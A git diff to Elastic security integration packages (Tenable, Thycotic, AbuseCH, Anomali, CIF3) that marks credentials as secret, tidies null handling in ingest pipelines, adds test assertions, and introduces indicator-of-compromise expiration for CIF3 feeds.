conditions: kibana: - version: ^8.7.1 + version: ^8.12.0 screenshots: - src: /img/tenable_io-screenshot.png title: Tenable Vulnerability Management dashboard screenshot @@ -49,6 +49,7 @@ policy_templates: multi: false required: true show_user: true + secret: true - name: secret_key type: password title: Secret Key @@ -56,6 +57,7 @@ policy_templates: multi: false required: true show_user: true + secret: true - name: proxy_url type: text title: Proxy URL diff --git a/packages/tenable_sc/changelog.yml b/packages/tenable_sc/changelog.yml index 2007a41f1e5..6286363cfdd 100644 --- a/packages/tenable_sc/changelog.yml +++ b/packages/tenable_sc/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.21.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9128 +- version: "1.20.2" + changes: + - description: Clean up null handling + type: bugfix + link: https://github.com/elastic/integrations/pull/9152 - version: "1.20.1" changes: - description: Changed owners diff --git a/packages/tenable_sc/data_stream/asset/elasticsearch/ingest_pipeline/default.yml b/packages/tenable_sc/data_stream/asset/elasticsearch/ingest_pipeline/default.yml index fd0190b27d4..345b3e1992d 100644 --- a/packages/tenable_sc/data_stream/asset/elasticsearch/ingest_pipeline/default.yml +++ b/packages/tenable_sc/data_stream/asset/elasticsearch/ingest_pipeline/default.yml @@ -187,7 +187,7 @@ processors: source: | def domain = ''; def nameArray = ctx.json.dnsName.toString().splitOnToken('.'); - if (nameArray?.length > 0) { + if (nameArray?.length != null && nameArray.length > 0) { for (int i = 1; i < nameArray.length; i++) { domain += nameArray[i] + (i < nameArray.length - 1 ? '.' : ''); } @@ -283,7 +283,7 @@ processors: ignore_missing: true - remove: field: event.original - if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event')) + if: ctx.tags?.contains('preserve_original_event') != true ignore_failure: true ignore_missing: true on_failure: diff --git a/packages/tenable_sc/data_stream/plugin/elasticsearch/ingest_pipeline/default.yml b/packages/tenable_sc/data_stream/plugin/elasticsearch/ingest_pipeline/default.yml index 08b8ba2e28b..f8b8eb8e0c8 100644 --- a/packages/tenable_sc/data_stream/plugin/elasticsearch/ingest_pipeline/default.yml +++ b/packages/tenable_sc/data_stream/plugin/elasticsearch/ingest_pipeline/default.yml @@ -405,7 +405,7 @@ processors: ignore_missing: true - remove: field: event.original - if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event')) + if: ctx.tags?.contains('preserve_original_event') != true ignore_failure: true ignore_missing: true on_failure: diff --git a/packages/tenable_sc/data_stream/vulnerability/elasticsearch/ingest_pipeline/default.yml b/packages/tenable_sc/data_stream/vulnerability/elasticsearch/ingest_pipeline/default.yml index 2085e7901ef..113b67b065d 100644 --- a/packages/tenable_sc/data_stream/vulnerability/elasticsearch/ingest_pipeline/default.yml +++ b/packages/tenable_sc/data_stream/vulnerability/elasticsearch/ingest_pipeline/default.yml @@ -14,7 +14,7 @@ processors: target_field: json ignore_failure: true - drop: - if: ctx.json?.response?.returnedRecords != null && ctx.json?.response?.returnedRecords == 0 + if: ctx.json?.response?.returnedRecords == 0 - fingerprint: fields: - json.lastSeen @@ -83,7 +83,7 @@ processors: - set: field: vulnerability.score.version value: '3.0' - if: ctx.json?.cvssV3BaseScore != '' || ctx.json?.cvssV3TemporalScore != '' + if: def empty = [null, '']; !empty.contains(ctx.json?.cvssV3BaseScore) || !empty.contains(ctx.json?.cvssV3TemporalScore) ignore_failure: true - split: field: json.seeAlso @@ -111,7 +111,7 @@ processors: - set: field: vulnerability.enumeration value: 'CVE' - if: ctx.json?.cve != '' + if: "![null, ''].contains(ctx.json?.cve)" ignore_failure: true - split: field: json.cve @@ -120,7 +120,7 @@ processors: - set: field: vulnerability.classification value: 'CVSS' - if: ctx.json?.cvssV3BaseScore != '' || ctx.json?.cvssV3TemporalScore != '' + if: "![null, ''].contains(ctx.json?.cvssV3BaseScore) || ![null, ''].contains(ctx.json?.cvssV3TemporalScore)" ignore_failure: true - rename: field: json.cvssV3BaseScore @@ -583,7 +583,7 @@ processors: ignore_missing: true - remove: field: event.original - if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event')) + if: ctx.tags?.contains('preserve_original_event') != true ignore_failure: true ignore_missing: true on_failure: diff --git a/packages/tenable_sc/manifest.yml b/packages/tenable_sc/manifest.yml index 8c169bd9f53..52426e572d5 100644 --- a/packages/tenable_sc/manifest.yml +++ b/packages/tenable_sc/manifest.yml @@ -1,8 +1,8 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: tenable_sc title: Tenable.sc # The version must be updated in the pipeline as well. Until elastic/kibana#121310 is implemented we will have to manually sync these. -version: "1.20.1" +version: "1.21.0" description: | Collect logs from Tenable.sc with Elastic Agent. type: integration @@ -10,7 +10,7 @@ categories: - security conditions: kibana: - version: ^8.7.1 + version: ^8.12.0 screenshots: - src: /img/tenable_sc-screenshot.png title: Tenable.sc vulnerability dashboard screenshot @@ -54,11 +54,13 @@ policy_templates: title: Access Key description: Access key for the Tenable.sc API. required: true + secret: true - name: secret_key type: password title: Secret Key description: Secret key for the Tenable.sc API. required: true + secret: true - name: batch_size type: text title: Batch Size diff --git a/packages/thycotic_ss/_dev/deploy/docker/docker-compose.yml b/packages/thycotic_ss/_dev/deploy/docker/docker-compose.yml index 930861d7de7..911af84a465 100644 --- a/packages/thycotic_ss/_dev/deploy/docker/docker-compose.yml +++ b/packages/thycotic_ss/_dev/deploy/docker/docker-compose.yml @@ -7,14 +7,12 @@ services: - ${SERVICE_LOGS_DIR}:/var/log command: /bin/sh -c "cp /sample_logs/* /var/log/" thycotic-ss-log-udp: - image: akroh/stream:v0.2.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9571 -p=udp /sample_logs/thycotic-ss-*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9571 -p=udp /sample_logs/thycotic-ss-*.log thycotic-ss-log-tcp: - image: akroh/stream:v0.2.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9571 -p=tcp /sample_logs/thycotic-ss-*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9571 -p=tcp /sample_logs/thycotic-ss-*.log diff --git a/packages/thycotic_ss/changelog.yml b/packages/thycotic_ss/changelog.yml index 3d9e7692082..62c79def1ad 100644 --- a/packages/thycotic_ss/changelog.yml +++ b/packages/thycotic_ss/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.7.0" + changes: + - description: Update manifest format version to v3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9404 - version: "1.6.2" changes: - description: Changed owners diff --git a/packages/thycotic_ss/data_stream/logs/_dev/test/system/test-logfile-config.yml b/packages/thycotic_ss/data_stream/logs/_dev/test/system/test-logfile-config.yml index 9f1ca6a8b5c..73646ab20c6 100644 --- a/packages/thycotic_ss/data_stream/logs/_dev/test/system/test-logfile-config.yml +++ b/packages/thycotic_ss/data_stream/logs/_dev/test/system/test-logfile-config.yml @@ -4,3 +4,5 @@ data_stream: vars: paths: - "{{SERVICE_LOGS_DIR}}/thycotic-ss-*.log" +assert: + hit_count: 1 diff --git a/packages/thycotic_ss/data_stream/logs/_dev/test/system/test-tcp-config.yml b/packages/thycotic_ss/data_stream/logs/_dev/test/system/test-tcp-config.yml index e6486d4c3a9..07efb8f1d0b 100644 --- a/packages/thycotic_ss/data_stream/logs/_dev/test/system/test-tcp-config.yml +++ b/packages/thycotic_ss/data_stream/logs/_dev/test/system/test-tcp-config.yml @@ -5,3 +5,5 @@ data_stream: vars: tcp_host: 0.0.0.0 tcp_port: 9571 +assert: + hit_count: 1 diff --git a/packages/thycotic_ss/data_stream/logs/_dev/test/system/test-udp-config.yml b/packages/thycotic_ss/data_stream/logs/_dev/test/system/test-udp-config.yml index 2fa92d630c9..9692279a844 100644 --- a/packages/thycotic_ss/data_stream/logs/_dev/test/system/test-udp-config.yml +++ b/packages/thycotic_ss/data_stream/logs/_dev/test/system/test-udp-config.yml @@ -5,3 +5,5 @@ data_stream: vars: udp_host: 0.0.0.0 udp_port: 9571 +assert: + hit_count: 1 diff --git a/packages/thycotic_ss/manifest.yml b/packages/thycotic_ss/manifest.yml index 4bab0672a3f..e28026f8f65 100644 --- a/packages/thycotic_ss/manifest.yml +++ b/packages/thycotic_ss/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: thycotic_ss title: "Thycotic Secret Server" -version: "1.6.2" +version: "1.7.0" source: license: "Elastic-2.0" description: "Thycotic Secret Server logs" diff --git a/packages/ti_abusech/changelog.yml b/packages/ti_abusech/changelog.yml index cca06edaeff..d629341c34c 100644 --- a/packages/ti_abusech/changelog.yml +++ b/packages/ti_abusech/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.25.0" + changes: + - description: Update manifest format version to v3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9404 - version: "1.24.1" changes: - description: Changed owners diff --git a/packages/ti_abusech/data_stream/malware/_dev/test/system/test-default-config.yml b/packages/ti_abusech/data_stream/malware/_dev/test/system/test-default-config.yml index 91dd3c58da1..03a73c985d5 100644 --- a/packages/ti_abusech/data_stream/malware/_dev/test/system/test-default-config.yml +++ b/packages/ti_abusech/data_stream/malware/_dev/test/system/test-default-config.yml @@ -8,3 +8,5 @@ data_stream: url: http://{{Hostname}}:{{Port}}/v1/payloads/recent/ preserve_original_event: true enable_request_tracer: true +assert: + hit_count: 2 diff --git a/packages/ti_abusech/data_stream/malwarebazaar/_dev/test/system/test-default-config.yml b/packages/ti_abusech/data_stream/malwarebazaar/_dev/test/system/test-default-config.yml index 1fc9c05fe2c..f829c29833f 100644 --- a/packages/ti_abusech/data_stream/malwarebazaar/_dev/test/system/test-default-config.yml +++ b/packages/ti_abusech/data_stream/malwarebazaar/_dev/test/system/test-default-config.yml @@ -5,3 +5,5 @@ data_stream: url: http://{{Hostname}}:{{Port}}/api/v1/ preserve_original_event: true enable_request_tracer: true +assert: + hit_count: 2 diff --git a/packages/ti_abusech/data_stream/threatfox/_dev/test/system/test-default-config.yml b/packages/ti_abusech/data_stream/threatfox/_dev/test/system/test-default-config.yml index bd34fcf8287..028b4eed20d 100644 --- a/packages/ti_abusech/data_stream/threatfox/_dev/test/system/test-default-config.yml +++ b/packages/ti_abusech/data_stream/threatfox/_dev/test/system/test-default-config.yml @@ -5,3 +5,5 @@ data_stream: url: http://{{Hostname}}:{{Port}}/api/v1/ preserve_original_event: true enable_request_tracer: true +assert: + hit_count: 2 diff --git a/packages/ti_abusech/data_stream/url/_dev/test/system/test-default-config.yml b/packages/ti_abusech/data_stream/url/_dev/test/system/test-default-config.yml index e180c3addda..22f51ba3a62 100644 --- a/packages/ti_abusech/data_stream/url/_dev/test/system/test-default-config.yml +++ b/packages/ti_abusech/data_stream/url/_dev/test/system/test-default-config.yml @@ -5,3 +5,5 @@ data_stream: url: http://{{Hostname}}:{{Port}}/v1/urls/recent/ preserve_original_event: true enable_request_tracer: true +assert: + hit_count: 2 diff --git a/packages/ti_abusech/manifest.yml b/packages/ti_abusech/manifest.yml index b29ea1a87d4..3e665fe480f 100644 --- a/packages/ti_abusech/manifest.yml +++ b/packages/ti_abusech/manifest.yml @@ -1,9 +1,9 @@ name: ti_abusech title: AbuseCH -version: "1.24.1" +version: "1.25.0" description: Ingest threat intelligence indicators from URL Haus, Malware Bazaar, and Threat Fox feeds with Elastic Agent. type: integration -format_version: "3.0.0" +format_version: "3.0.3" categories: ["security", "threat_intel"] conditions: kibana: diff --git a/packages/ti_anomali/changelog.yml b/packages/ti_anomali/changelog.yml index fd7b9da65dc..89ee6b1ba53 100644 --- a/packages/ti_anomali/changelog.yml +++ b/packages/ti_anomali/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.20.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9129 - version: "1.19.2" changes: - description: Changed owners diff --git a/packages/ti_anomali/data_stream/threatstream/manifest.yml b/packages/ti_anomali/data_stream/threatstream/manifest.yml index c1cd9f11ce2..b5521752134 100644 --- a/packages/ti_anomali/data_stream/threatstream/manifest.yml +++ b/packages/ti_anomali/data_stream/threatstream/manifest.yml @@ -36,12 +36,13 @@ streams: show_user: false default: application/x-ndjson - name: secret - type: text + type: password title: HMAC secret key description: Secret key to authenticate requests from the SDK. multi: false required: false show_user: true + secret: true - name: ssl type: yaml title: TLS diff --git a/packages/ti_anomali/manifest.yml b/packages/ti_anomali/manifest.yml index 435bd796e58..9425108585a 100644 --- a/packages/ti_anomali/manifest.yml +++ b/packages/ti_anomali/manifest.yml @@ -1,13 +1,13 @@ name: ti_anomali title: Anomali -version: "1.19.2" +version: "1.20.0" description: Ingest threat intelligence indicators from Anomali with Elastic Agent. type: integration -format_version: 3.0.0 +format_version: 3.0.2 categories: ["security", "threat_intel"] conditions: kibana: - version: ^8.8.0 + version: ^8.12.0 icons: - src: /img/anomali.svg title: Anomali diff --git a/packages/ti_cif3/_dev/build/docs/README.md b/packages/ti_cif3/_dev/build/docs/README.md index 06f1cb5a417..6843f6eaf06 100644 --- a/packages/ti_cif3/_dev/build/docs/README.md +++ b/packages/ti_cif3/_dev/build/docs/README.md @@ -2,6 +2,21 @@ This integration connects with the [REST API from the running CIFv3 instance](https://github.com/csirtgadgets/bearded-avenger-deploymentkit/wiki/REST-API) to retrieve indicators. +## Expiration of Indicators of Compromise (IOCs) +Indicators are expired after a certain duration. An [Elastic Transform](https://www.elastic.co/guide/en/elasticsearch/reference/current/transforms.html) is created for a source index to allow only active indicators to be available to the end users. The transform creates a destination index named `logs-ti_cif3_latest.dest_feed*` which only contains active and unexpired indicators. Destination indices are aliased to `logs-ti_cif3_latest.feed`. The indicator match rules and dashboards are updated to show only active indicators. + +| Indicator Type | Indicator Expiration Duration | +|:------------------|:------------------------------------------------| +| `ipv4-addr` | `45d` | +| `ipv6-addr` | `45d` | +| `domain-name` | `90d` | +| `url` | `365d` | +| `file` | `365d` | +| All Other Types | Derived from `IOC Expiration Duration` setting | + +### ILM Policy +To facilitate IOC expiration, source datastream-backed indices `.ds-logs-ti_cif3.feed-*` are allowed to contain duplicates. ILM policy `logs-ti_cif3.feed-default_policy` is added to these source indices so it doesn't lead to unbounded growth. This means data in these source indices will be deleted after `5 days` from ingested date. + ## Data Streams ### Feed diff --git a/packages/ti_cif3/_dev/deploy/docker/files/config.yml b/packages/ti_cif3/_dev/deploy/docker/files/config.yml index 16a152b8de6..c33382ac9a3 100644 --- a/packages/ti_cif3/_dev/deploy/docker/files/config.yml +++ b/packages/ti_cif3/_dev/deploy/docker/files/config.yml @@ -152,10 +152,49 @@ rules: "protocol": "tcp", "asn": 135905, "asn_desc": "vietnam posts and telecommunications group", - "firsttime": "2022-07-19T09:30:19.000000Z", - "reporttime": "2022-07-20T00:19:11.521288Z", - "lasttime": "2022-07-19T09:30:19.000000Z", + "firsttime": "2024-04-01T09:30:19.000000Z", + "reporttime": "2024-04-02T00:19:11.521288Z", + "lasttime": "2024-04-03T09:30:19.000000Z", "indicator_ipv4": "103.133.105.50" + }, + { + "indicator": "baddom.madeup.local", + "itype": "fqdn", + "tlp": "white", + "provider": "sslbl.abuse.ch", + "group": [ + "everyone" + ], + "count": 1, + "tags": [ + "botnet" + ], + "confidence": 80, + "uuid": "be240898-1443-4d7e-a78a-1daed210c182", + "application": "https", + "reference": "https://sslbl.abuse.ch/blacklist/sslipblacklist.csv", + "firsttime": "2024-03-20T20:25:53.000000Z", + "reporttime": "2024-03-21T20:33:26.585967Z", + "lasttime": "2024-03-20T20:25:53.000000Z" + }, + { + "indicator": "http://www.doordelivery.life/km37", + "itype": "url", + "tlp": "white", + "provider": "sslbl.abuse.ch", + "group": [ + "everyone" + ], + "count": 1, + "tags": [ + "botnet" + ], + "confidence": 70, + "uuid": "bf340888-1343-4e7d-a78a-1daed210c182", + "reference": "https://sslbl.abuse.ch/blacklist/sslipblacklist.csv", + "firsttime": "2023-07-20T20:25:53.000000Z", + "reporttime": "2023-07-21T20:33:26.585967Z", + "lasttime": "2023-07-20T20:25:53.000000Z" } ] } diff --git a/packages/ti_cif3/changelog.yml b/packages/ti_cif3/changelog.yml index f978477eb3a..c3e7453cd8a 100644 --- a/packages/ti_cif3/changelog.yml +++ b/packages/ti_cif3/changelog.yml @@ -1,4 +1,19 @@ # newer versions go on top +- version: "1.12.0" + changes: + - description: Support for IOC expiration + type: enhancement + link: https://github.com/elastic/integrations/pull/9550 +- version: "1.11.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9129 +- version: "1.10.2" + changes: + - description: Clean up null handling + type: bugfix + link: https://github.com/elastic/integrations/pull/9148 - version: "1.10.1" changes: - description: Changed owners diff --git a/packages/ti_cif3/data_stream/feed/_dev/test/pipeline/test-cif3-no-preserve-ndjson.log-config.yml b/packages/ti_cif3/data_stream/feed/_dev/test/pipeline/test-cif3-no-preserve-ndjson.log-config.yml index c41ee36923e..ed40c141690 100644 --- a/packages/ti_cif3/data_stream/feed/_dev/test/pipeline/test-cif3-no-preserve-ndjson.log-config.yml +++ b/packages/ti_cif3/data_stream/feed/_dev/test/pipeline/test-cif3-no-preserve-ndjson.log-config.yml @@ -1,2 +1,4 @@ fields: tags: ~ + _conf: + ioc_expiration_duration: 5d diff --git a/packages/ti_cif3/data_stream/feed/_dev/test/pipeline/test-cif3-no-preserve-ndjson.log-expected.json b/packages/ti_cif3/data_stream/feed/_dev/test/pipeline/test-cif3-no-preserve-ndjson.log-expected.json index 1999325a749..f1c5524101f 100644 --- a/packages/ti_cif3/data_stream/feed/_dev/test/pipeline/test-cif3-no-preserve-ndjson.log-expected.json +++ b/packages/ti_cif3/data_stream/feed/_dev/test/pipeline/test-cif3-no-preserve-ndjson.log-expected.json @@ -2,6 +2,9 @@ "expected": [ { "cif3": { + "deleted_at": "2022-09-02T08:35:05.971Z", + "expiration_duration": "45d", + "indicator": "89.160.20.156", "itype": "ipv4", "rdata": "http://208.67.106.111/theme/inc/e26dbe0dcc481e.php", "uuid": "3fbdd654-b2b0-498c-8e20-ef87bce73672" @@ -32,13 +35,14 @@ "indicator": { "confidence": "High", "description": "agent tesla", - "first_seen": "2022-07-19T07:40:41.000000Z", + "first_seen": "2022-07-19T07:40:41.000Z", "ip": "89.160.20.156", - "last_seen": "2022-07-19T08:35:05.971696Z", + "last_seen": "2022-07-19T08:35:05.971Z", "marking": { "tlp": "WHITE" }, "modified_at": "2022-07-19T08:35:05.971696Z", + "name": "89.160.20.156", "provider": "threatfox.abuse.ch", "reference": "https://threatfox.abuse.ch/ioc/838651/", "sightings": 1, diff --git a/packages/ti_cif3/data_stream/feed/_dev/test/pipeline/test-cif3-sample-ndjson.log-config.yml b/packages/ti_cif3/data_stream/feed/_dev/test/pipeline/test-cif3-sample-ndjson.log-config.yml index 4da22641654..2c7449ef783 100644 --- a/packages/ti_cif3/data_stream/feed/_dev/test/pipeline/test-cif3-sample-ndjson.log-config.yml +++ b/packages/ti_cif3/data_stream/feed/_dev/test/pipeline/test-cif3-sample-ndjson.log-config.yml @@ -1,3 +1,5 @@ fields: tags: - preserve_original_event + _conf: + ioc_expiration_duration: 5d diff --git a/packages/ti_cif3/data_stream/feed/_dev/test/pipeline/test-cif3-sample-ndjson.log-expected.json b/packages/ti_cif3/data_stream/feed/_dev/test/pipeline/test-cif3-sample-ndjson.log-expected.json index 83ed2b4f1d7..3cab2556497 100644 --- a/packages/ti_cif3/data_stream/feed/_dev/test/pipeline/test-cif3-sample-ndjson.log-expected.json +++ b/packages/ti_cif3/data_stream/feed/_dev/test/pipeline/test-cif3-sample-ndjson.log-expected.json @@ -2,6 +2,9 @@ "expected": [ { "cif3": { + "deleted_at": "2022-09-02T08:35:05.971Z", + "expiration_duration": "45d", + "indicator": "89.160.20.156", "itype": "ipv4", "rdata": "http://208.67.106.111/theme/inc/e26dbe0dcc481e.php", "uuid": "3fbdd654-b2b0-498c-8e20-ef87bce73672" @@ -34,13 +37,14 @@ "indicator": { "confidence": "High", "description": "agent tesla", - "first_seen": "2022-07-19T07:40:41.000000Z", + "first_seen": "2022-07-19T07:40:41.000Z", "ip": "89.160.20.156", - "last_seen": "2022-07-19T08:35:05.971696Z", + "last_seen": "2022-07-19T08:35:05.971Z", "marking": { "tlp": "WHITE" }, "modified_at": "2022-07-19T08:35:05.971696Z", + "name": "89.160.20.156", "provider": "threatfox.abuse.ch", "reference": "https://threatfox.abuse.ch/ioc/838651/", "sightings": 1, diff --git a/packages/ti_cif3/data_stream/feed/_dev/test/system/test-default-config.yml b/packages/ti_cif3/data_stream/feed/_dev/test/system/test-default-config.yml index 0f55f1388f6..4ef21b61607 100644 --- a/packages/ti_cif3/data_stream/feed/_dev/test/system/test-default-config.yml +++ b/packages/ti_cif3/data_stream/feed/_dev/test/system/test-default-config.yml @@ -10,3 +10,6 @@ data_stream: type: ipv4 cif_tags: 'botnet,exploit,malware,phishing' enable_request_tracer: true + ioc_expiration_duration: 10d +assert: + hit_count: 6 diff --git a/packages/ti_cif3/data_stream/feed/agent/stream/httpjson.yml.hbs b/packages/ti_cif3/data_stream/feed/agent/stream/httpjson.yml.hbs index 799a95c2188..25d6a5ffd9f 100644 --- a/packages/ti_cif3/data_stream/feed/agent/stream/httpjson.yml.hbs +++ b/packages/ti_cif3/data_stream/feed/agent/stream/httpjson.yml.hbs @@ -75,6 +75,13 @@ cursor: last_requested_at: value: '[[ formatDate (now) "RFC3339" ]]' +{{#if ioc_expiration_duration}} +fields_under_root: true +fields: + _conf: + ioc_expiration_duration: "{{ioc_expiration_duration}}" +{{/if}} + tags: {{#if preserve_original_event}} - preserve_original_event diff --git a/packages/ti_cif3/data_stream/feed/elasticsearch/ilm/default_policy.json b/packages/ti_cif3/data_stream/feed/elasticsearch/ilm/default_policy.json new file mode 100644 index 00000000000..68d2c5e57a6 --- /dev/null +++ b/packages/ti_cif3/data_stream/feed/elasticsearch/ilm/default_policy.json @@ -0,0 +1,23 @@ +{ + "policy": { + "phases": { + "hot": { + "actions": { + "rollover": { + "max_age": "2d", + "max_size": "50gb" + }, + "set_priority": { + "priority": 100 + } + } + }, + "delete": { + "min_age": "3d", + "actions": { + "delete": {} + } + } + } + } +} \ No newline at end of file diff --git a/packages/ti_cif3/data_stream/feed/elasticsearch/ingest_pipeline/default.yml b/packages/ti_cif3/data_stream/feed/elasticsearch/ingest_pipeline/default.yml index 1a1610e0cc9..64a2ba8a997 100644 --- a/packages/ti_cif3/data_stream/feed/elasticsearch/ingest_pipeline/default.yml +++ b/packages/ti_cif3/data_stream/feed/elasticsearch/ingest_pipeline/default.yml @@ -31,14 +31,32 @@ processors: ##################### # Threat ECS Fields # ##################### - - rename: + - date: field: cif3.firsttime target_field: threat.indicator.first_seen - ignore_missing: true - - rename: + tag: date-indicator_first_seen + formats: + - "ISO8601" + if: ctx.cif3?.firsttime != null + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}}' + - date: field: cif3.lasttime target_field: threat.indicator.last_seen - ignore_missing: true + tag: date-indicator_last_seen + formats: + - "ISO8601" + if: ctx.cif3?.lasttime != null + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}}' + - set: + field: threat.indicator.name + copy_from: cif3.indicator + if: ctx.cif3?.indicator != null - rename: field: cif3.reporttime target_field: threat.indicator.modified_at @@ -69,21 +87,21 @@ processors: - set: field: threat.indicator.type value: file - if: "['md5', 'sha1', 'sha256', 'sha512', 'ssdeep'].contains(ctx.cif3?.itype) && !ctx.cif3?.tags.contains('ja3')" + if: "ctx.cif3?.tags?.contains('ja3') != true && ['md5', 'sha1', 'sha256', 'sha512', 'ssdeep'].contains(ctx.cif3?.itype)" - rename: field: cif3.indicator target_field: threat.indicator.tls.client.ja3 ignore_missing: true - if: "ctx.cif3?.itype == 'md5' && ctx.cif3?.tags.contains('ja3')" + if: "ctx.cif3?.itype == 'md5' && ctx.cif3?.tags?.contains('ja3') == true" - rename: field: cif3.indicator target_field: threat.indicator.file.pe.imphash ignore_missing: true - if: "ctx.cif3?.itype == 'md5' && ctx.cif3?.tags.contains('imphash')" + if: "ctx.cif3?.itype == 'md5' && ctx.cif3?.tags?.contains('imphash') == true" - append: field: related.hash value: "{{{ threat.indicator.file.hash.pe.imphash }}}" - if: ctx?.threat?.indicator?.file?.pe?.imphash != null + if: ctx.threat?.indicator?.file?.pe?.imphash != null - rename: field: cif3.indicator target_field: _tmp.hashvalue @@ -124,13 +142,13 @@ processors: field: cif3.indicator target_field: threat.indicator.network.cidr ignore_missing: true - if: "ctx.threat?.indicator?.type != null && ['ipv4-addr', 'ipv6-addr'].contains(ctx.threat.indicator.type) && (ctx.cif3?.indicator_ipv4_mask != null || ctx.cif3?.indicator_ipv6_mask != null)" + if: "(ctx.cif3?.indicator_ipv4_mask != null || ctx.cif3?.indicator_ipv6_mask != null) && ['ipv4-addr', 'ipv6-addr'].contains(ctx.threat?.indicator?.type)" - convert: field: cif3.indicator type: ip target_field: threat.indicator.ip ignore_missing: true - if: "ctx.threat?.indicator?.type != null && ['ipv4-addr', 'ipv6-addr'].contains(ctx.threat.indicator.type) && ctx.cif3?.indicator_ipv4_mask == null && ctx.cif3?.indicator_ipv6_mask == null" + if: "ctx.cif3?.indicator_ipv4_mask == null && ctx.cif3?.indicator_ipv6_mask == null && ['ipv4-addr', 'ipv6-addr'].contains(ctx.threat?.indicator?.type)" - append: field: related.ip value: "{{{ threat.indicator.ip }}}" @@ -139,37 +157,37 @@ processors: field: cif3.cc target_field: threat.indicator.geo.country_iso_code ignore_missing: true - if: "ctx.threat?.indicator?.type != null && ['ipv4-addr', 'ipv6-addr'].contains(ctx.threat.indicator.type) && ctx.cif3?.cc != null" + if: "ctx.cif3?.cc != null && ['ipv4-addr', 'ipv6-addr'].contains(ctx.threat?.indicator?.type)" - rename: field: cif3.asn target_field: threat.indicator.as.number ignore_missing: true - if: "ctx.threat?.indicator?.type != null && ['ipv4-addr', 'ipv6-addr'].contains(ctx.threat.indicator.type) && ctx.cif3?.asn != null" + if: "ctx.cif3?.asn != null && ['ipv4-addr', 'ipv6-addr'].contains(ctx.threat?.indicator?.type)" - rename: field: cif3.asn_desc target_field: threat.indicator.as.organization.name ignore_missing: true - if: "ctx.threat?.indicator?.type != null && ['ipv4-addr', 'ipv6-addr'].contains(ctx.threat.indicator.type) && ctx.cif3?.asn_desc != null" + if: "ctx.cif3?.asn_desc != null && ['ipv4-addr', 'ipv6-addr'].contains(ctx.threat?.indicator?.type)" - rename: field: cif3.latitude target_field: threat.indicator.geo.location.lat ignore_missing: true - if: "ctx.threat?.indicator?.type != null && ['ipv4-addr', 'ipv6-addr'].contains(ctx.threat.indicator.type) && ctx.cif3?.latitude != null" + if: "ctx.cif3?.latitude != null && ['ipv4-addr', 'ipv6-addr'].contains(ctx.threat?.indicator?.type)" - rename: field: cif3.longitude target_field: threat.indicator.geo.location.lon ignore_missing: true - if: "ctx.threat?.indicator?.type != null && ['ipv4-addr', 'ipv6-addr'].contains(ctx.threat.indicator.type) && ctx.cif3?.longitude != null" + if: "ctx.cif3?.longitude != null && ['ipv4-addr', 'ipv6-addr'].contains(ctx.threat?.indicator?.type)" - rename: field: cif3.region target_field: threat.indicator.geo.region_name ignore_missing: true - if: "ctx.threat?.indicator?.type != null && ['ipv4-addr', 'ipv6-addr'].contains(ctx.threat.indicator.type) && ctx.cif3?.region != null" + if: "ctx.cif3?.region != null && ['ipv4-addr', 'ipv6-addr'].contains(ctx.threat?.indicator?.type)" - rename: field: cif3.timezone target_field: threat.indicator.geo.timezone ignore_missing: true - if: "ctx.threat?.indicator?.type != null && ['ipv4-addr', 'ipv6-addr'].contains(ctx.threat.indicator.type) && ctx.cif3?.timezone != null" + if: "ctx.cif3?.timezone != null && ['ipv4-addr', 'ipv6-addr'].contains(ctx.threat?.indicator?.type)" ## URL indicator operations - set: @@ -225,7 +243,7 @@ processors: - append: field: related.hosts value: "{{{ threat.indicator.url.domain }}}" - if: ctx?.threat?.indicator?.url?.domain != null + if: ctx.threat?.indicator?.url?.domain != null ###################### # Confidence # @@ -281,14 +299,86 @@ processors: # sometimes contains a range like 1000-1002 or CSVs like 10,22,52 ignore_failure: true if: ctx.cif3?.port != null - - ###################### - # Cleanup processors # - ###################### - set: field: threat.indicator.type value: unknown if: ctx.threat?.indicator?.type == null + + ################### + # IOC Expiration # + ################### + - script: + lang: painless + tag: script-default-deleted_at + if: ctx.cif3?.deleted_at == null && ctx._conf?.ioc_expiration_duration != null && ctx._conf.ioc_expiration_duration != '' + description: Indicator Expiration is done after - `45d` for IP, `90d` for domain, `365d` for URL, Hash. For all other indicators after `_conf.ioc_expiration_duration` (default 730d) since their lasttime. This script adds a default `cif3.deleted_at` field to allow indicator expiration. + source: > + ZonedDateTime _tmp_deleted_at; + ZonedDateTime _tmp_lasttime_at; + if (ctx.threat.indicator.last_seen != null) { + _tmp_lasttime_at = ZonedDateTime.parse(ctx.threat.indicator.last_seen); + } + else { + _tmp_lasttime_at = ZonedDateTime.parse(ctx.threat.indicator.first_seen); + } + if (ctx.threat.indicator.type == 